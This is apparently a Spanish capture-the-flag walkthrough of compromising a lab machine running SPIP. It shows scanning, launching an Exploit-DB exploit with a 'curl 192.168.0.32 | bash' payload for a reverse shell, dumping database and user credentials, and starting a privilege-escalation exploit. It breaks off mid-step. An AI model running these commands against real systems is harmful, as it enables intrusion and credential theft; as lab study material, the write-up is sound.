Hacemos el escaneo con nmap:
Esto es lo que corre por el puerto 80:
Vemos en searchsploit si existen exploits con SPIP:
O también por exploitdb y nos bajamos este mismo:
https://www.exploit-db.com/exploits/51536
Por tanto lo que haremos será primero crear un servidor http con python con el payload de la reverse shell:
Lanzamos el exploit:
python3 51536.py -u http://192.168.0.34/ -c "curl 192.168.0.32 | bash" -v
Y recibimos la conexión con netcat:
Y el contenido del fichero .bash_history nos da una pista de que igual podemos entrar a la base de datos, aunque aún nos falta la contraseña:
Y dentro del directorio config nos encontramos con un archivo llamado connect.php con la contraseña de root de la base de datos:
root:dbpassword
Usamos la base de datos spip y vemos una tabla llamada spip_auteurs:
Seleccionamos todo el contenido de la tabla spip_auteurs y vemos las credenciales del usuario angela:
angela:4ng3l4
Nos autenticamos y ya somos el usuario angela:
Y vemos que estamos ante esta versión de ubuntu:
Y si miramos en google tenemos este exploit:
Y buscamos por ese cve llegando a este repositorio de github:
Nos lo bajamos en la máquina víctima:
Ejecutamos un try y comienza una especie de contador:

















